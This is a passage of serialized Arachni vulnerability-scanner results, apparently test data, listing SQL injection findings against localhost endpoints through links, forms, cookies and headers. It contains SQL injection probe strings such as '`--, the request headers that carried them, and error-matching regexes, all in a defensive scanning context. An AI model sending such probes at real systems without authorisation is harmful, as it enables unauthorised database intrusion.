      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\])
    regexp_match: "[DM_QUERY_E_SYNTAX]"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: "[\"[DM_QUERY_E_SYNTAX]\\nhas occurred in the vicinity of:\\n\", nil]"
    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/emc/link/flip?input=default
    var: Parameter flip
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: link
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/emc/link/append?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "53"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "[DM_QUERY_E_SYNTAX]"
    injected: default'`--
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\])
      :match: "[DM_QUERY_E_SYNTAX]"
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :param_flip: true
      :injected_orig: "'`--"
      :altered: input
      :element: link
      :params: 
        input: default'`--
      :follow_location: true
      :injected: default'`--
      :combo: 
        input: default'`--
      :action: http://localhost:7842/emc/link/append?input=default
      :verification: false
      :id: "[DM_QUERY_E_SYNTAX]"
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\])
    regexp_match: "[DM_QUERY_E_SYNTAX]"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      [DM_QUERY_E_SYNTAX]
      has occurred in the vicinity of:

    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/emc/link/append?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: cookie
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/emc/cookie/flip
  var: Parameter flip
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value;'`--=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "64"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "[DM_QUERY_E_SYNTAX]"
    injected: ""
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\])
      :match: "[DM_QUERY_E_SYNTAX]"
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'`--"
      :altered: Parameter flip
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :injected: ""
      :combo: 
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:7842/emc/cookie/flip
      :verification: false
      :id: "[DM_QUERY_E_SYNTAX]"
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\])
    regexp_match: "[DM_QUERY_E_SYNTAX]"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: "[nil, \"[DM_QUERY_E_SYNTAX]\\nhas occurred in the vicinity of:\\n\"]"
    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/emc/cookie/flip
    var: Parameter flip
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: cookie
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/emc/cookie/append
  var: cookie2
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value)
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "53"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "[DM_QUERY_E_SYNTAX]"
    injected: cookie value)
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\])
      :match: "[DM_QUERY_E_SYNTAX]"
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: )
      :altered: cookie2
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie2: cookie value)
      :injected: cookie value)
      :combo: 
        cookie2: cookie value)
      :action: http://localhost:7842/emc/cookie/append
      :verification: false
      :id: "[DM_QUERY_E_SYNTAX]"
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\])
    regexp_match: "[DM_QUERY_E_SYNTAX]"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      [DM_QUERY_E_SYNTAX]
      has occurred in the vicinity of:

    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/emc/cookie/append
    var: cookie2
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: header
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/emc/header/flip
  var: Parameter flip
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "214"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "[DM_QUERY_E_SYNTAX]"
    injected: ""
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\])
      :match: "[DM_QUERY_E_SYNTAX]"
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'`--"
      :altered: Parameter flip
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :injected: ""
      :combo: 
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:7842/emc/header/flip
      :verification: false
      :id: "[DM_QUERY_E_SYNTAX]"
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\])
    regexp_match: "[DM_QUERY_E_SYNTAX]"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: "[nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, \"[DM_QUERY_E_SYNTAX]\\nhas occurred in the vicinity of:\\n\", nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil]"
    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/emc/header/flip
    var: Parameter flip
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: header
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/emc/header/append
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user'`--
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "53"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "[DM_QUERY_E_SYNTAX]"
    injected: arachni_user'`--
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\])
      :match: "[DM_QUERY_E_SYNTAX]"
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'`--"
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user'`--
      :injected: arachni_user'`--
      :combo: 
        User-Agent: arachni_user'`--
      :action: http://localhost:7842/emc/header/append
      :verification: false
      :id: "[DM_QUERY_E_SYNTAX]"
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\])
    regexp_match: "[DM_QUERY_E_SYNTAX]"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      [DM_QUERY_E_SYNTAX]
      has occurred in the vicinity of:

    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/emc/header/append
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: form
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/sqlite/form/flip
  var: Parameter flip
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "105"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n", nil]
    injected: ""
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:Warning.*sqlite_.*)
      :match: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n", nil]
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :param_flip: true
      :injected_orig: "'`--"
      :altered: Parameter flip
      :element: form
      :params: 
        input: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :follow_location: true
      :injected: ""
      :combo: 
        input: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:7842/sqlite/form/flip
      :verification: false
      :id: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n", nil]
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:Warning.*sqlite_.*)
    regexp_match: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n", nil]
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: "[\"Warning stuff sqlite_\\nSQLite/JDBCDriver\\nSQLite.Exception\\nSystem.Data.SQLite.SQLiteException\\n\", nil]"
    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/sqlite/form/flip
    var: Parameter flip
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: form
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/sqlite/form/append
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "92"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: Warning stuff sqlite_
    injected: default'`--
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:Warning.*sqlite_.*)
      :match: Warning stuff sqlite_
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :param_flip: true
      :injected_orig: "'`--"
      :altered: input
      :element: form
      :params: 
        input: default'`--
      :follow_location: true
      :injected: default'`--
      :combo: 
        input: default'`--
      :action: http://localhost:7842/sqlite/form/append
      :verification: false
      :id: Warning stuff sqlite_
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:Warning.*sqlite_.*)
    regexp_match: Warning stuff sqlite_
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      Warning stuff sqlite_
      SQLite/JDBCDriver
      SQLite.Exception
      System.Data.SQLite.SQLiteException

    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/sqlite/form/append
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: link
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/sqlite/link/flip?input=default
  var: Parameter flip
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "105"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n", nil]
    injected: ""
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:Warning.*sqlite_.*)
      :match: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n", nil]
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :param_flip: true
      :injected_orig: "'`--"
      :altered: Parameter flip
      :element: link
      :params: 
        input: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :follow_location: true
      :injected: ""
      :combo: 
        input: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:7842/sqlite/link/flip?input=default
      :verification: false
      :id: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n", nil]
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:Warning.*sqlite_.*)
    regexp_match: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n", nil]
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: "[\"Warning stuff sqlite_\\nSQLite/JDBCDriver\\nSQLite.Exception\\nSystem.Data.SQLite.SQLiteException\\n\", nil]"
    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/sqlite/link/flip?input=default
    var: Parameter flip
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: link
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/sqlite/link/append?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "92"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: Warning stuff sqlite_
    injected: default'`--
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:Warning.*sqlite_.*)
      :match: Warning stuff sqlite_
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :param_flip: true
      :injected_orig: "'`--"
      :altered: input
      :element: link
      :params: 
        input: default'`--
      :follow_location: true
      :injected: default'`--
      :combo: 
        input: default'`--
      :action: http://localhost:7842/sqlite/link/append?input=default
      :verification: false
      :id: Warning stuff sqlite_
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:Warning.*sqlite_.*)
    regexp_match: Warning stuff sqlite_
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      Warning stuff sqlite_
      SQLite/JDBCDriver
      SQLite.Exception
      System.Data.SQLite.SQLiteException

    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/sqlite/link/append?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: cookie
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/sqlite/cookie/flip
  var: Parameter flip
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value;'`--=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "105"
        Connection: keep-alive
